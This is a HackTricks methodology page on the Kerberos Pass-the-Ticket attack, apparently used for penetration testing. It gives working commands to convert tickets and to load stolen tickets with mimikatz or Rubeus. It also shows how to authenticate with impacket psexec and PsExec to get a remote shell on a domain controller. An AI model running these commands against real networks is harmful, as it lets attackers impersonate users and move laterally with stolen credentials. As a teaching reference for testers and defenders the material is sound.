hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md
2022-09-09 13:28:04 +02:00

5.5 KiB

Pass the Ticket

Support HackTricks and get benefits!

{% hint style="danger" %}

Through Security Skills as a Service, we help organizations to defend against the Dark Hacking Arts. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering high-quality penetration testing results. Security Hubs bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a complete assessment of any risks.

{% embed url="https://securityhubs.io/" %} {% endhint %}

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.

Read:

Swaping Linux and Windows tickets between platforms

The ticket_converter script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:

root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Kekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.

Pass The Ticket Attack

{% code title="Linux" %}

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

{% endcode %}

{% code title="Windows" %}

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

{% endcode %}

{% hint style="danger" %}

Through Security Skills as a Service, we help organizations to defend against the Dark Hacking Arts. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering high-quality penetration testing results. Security Hubs bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a complete assessment of any risks.

{% embed url="https://securityhubs.io/" %} {% endhint %}

Support HackTricks and get benefits!